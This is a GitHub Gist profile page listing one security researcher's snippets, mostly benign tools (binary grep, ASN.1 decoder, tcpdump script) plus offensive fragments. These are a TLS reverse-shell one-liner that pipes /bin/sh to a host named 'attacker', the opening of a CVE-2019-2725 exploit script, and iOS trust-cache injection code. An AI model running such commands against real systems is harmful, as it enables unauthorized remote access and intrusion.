Skip to content

Instantly share code, notes, and snippets.

View gteissier's full-sized avatar
🎱
Focusing

guillaume teissier gteissier

🎱
Focusing
57 followers · 42 following
View GitHub Profile
@gteissier
gteissier / Makefile
Last active October 17, 2018 14:23
Binary grep: Python re, C Knuth-Pratt-Morris, C memmem, Ragel based. Indication of performance: Ragel is the winner, memmem is the worst
CFLAGS=-g -O2
all: bgrep-ragel.rl bgrep-kmp.c
ragel -C -G2 -o bgrep-ragel.c bgrep-ragel.rl
gcc -Wno-unused-const-variable $(CFLAGS) -c bgrep-ragel.c -o bgrep-ragel.o
gcc -o bgrep-ragel bgrep-ragel.o
gcc $(CFLAGS) -c bgrep-kmp.c -o bgrep-kmp.o
gcc -o bgrep-kmp bgrep-kmp.o
gcc $(CFLAGS) -c bgrep-memmem.c -o bgrep-memmem.o
gcc -o bgrep-memmem bgrep-memmem.o
@gteissier
gteissier / inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
Created February 22, 2019 08:00 — forked from Proteas/inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
// iPhone11,2-4-6
void inject_trusts(int pathc, const char *paths[])
{
printf("[+] injecting into trust cache...\n");
extern uint64_t g_kern_base;
static uint64_t tc = 0;
if (tc == 0) {
// loaded_trust_caches: 0xFFFFFFF008F702C8
@gteissier
gteissier / cmd.sh
Last active April 9, 2024 09:46
TLS reverse shell
# attacker side: create auto-signed certificate and setup a listener
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
# victim side: connect back to attacker using TLS
mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect attacker:443 > fifo; rm fifo
@gteissier
gteissier / ber.py
Last active April 29, 2021 15:56
ASN.1 BER decoder
from cStringIO import StringIO
from struct import pack
from binascii import unhexlify, hexlify
from itertools import count, dropwhile
VERBOSE = True
class Asn1Obj:
'''generic frame for ASN1 fields, supports nesting'''
def __init__(self, klass, constructed, type, indefinite, value=None, children=[], absorbed=None):
@gteissier
gteissier / mass-webshot.py
Created April 26, 2019 07:28
Take web screenshots
#!/usr/bin/env python
from selenium import webdriver
import selenium
import sys
import re
def take_screenshot(url, png):
options = webdriver.ChromeOptions()
options.add_argument('headless')
@gteissier
gteissier / asciinema_rebase.py
Created April 29, 2019 04:19
Asciinema now stores timestamp from the start of the capture. To skip start of the capture, one needs to offset the timestamps from the first kept in the capture.
#!/usr/bin/env python
import sys
import json
start_time = None
for line in sys.stdin.readlines():
o = json.loads(line)
if type(o) != type([]):
@gteissier
gteissier / cve-2019-2725.py
Created May 3, 2019 09:51
CVE-2019-2725
#!/usr/bin/env python
import requests
import sys
from base64 import b64encode
LHOST = '172.16.89.1'
LPORT = 8888
@gteissier
gteissier / pygrep.py
Created May 10, 2019 09:29
Look for FLAG[0-9a-zA-Z/+=]+ pattern everywhere, even in jar contained in zip contained in ear
#!/usr/bin/env python
import os
import re
import zipfile
from cStringIO import StringIO
def process_file(f):
data = f.read()
for m in re.finditer(r'(FLAG[0-9a-zA-Z/+=]+)', data):
@gteissier
gteissier / compute-internal-state.py
Created September 4, 2019 11:50
glibc derandomization
#!/usr/bin/env python
import z3
import sys
# glibc default PRNG
# it is called TYPE_3, and is an additive recursive generator
# its internal state is made of 31 32-bits integers
# r_0 ... r_30
# each call to random will modify the internal state
@gteissier
gteissier / tcpdump.py
Created December 14, 2019 15:19
Pythonic tcpdump: copy, paste, and enjoy
#!/usr/bin/env python
'''
It has been tested with either py2 or py3.
Beware ancient versions of Linux kernel which may not support SOCK_NONBLOCK
or the memory mapped ring buffer.
BPF filter listed below is compiled form of "not port 22"
if you want to change it, do something like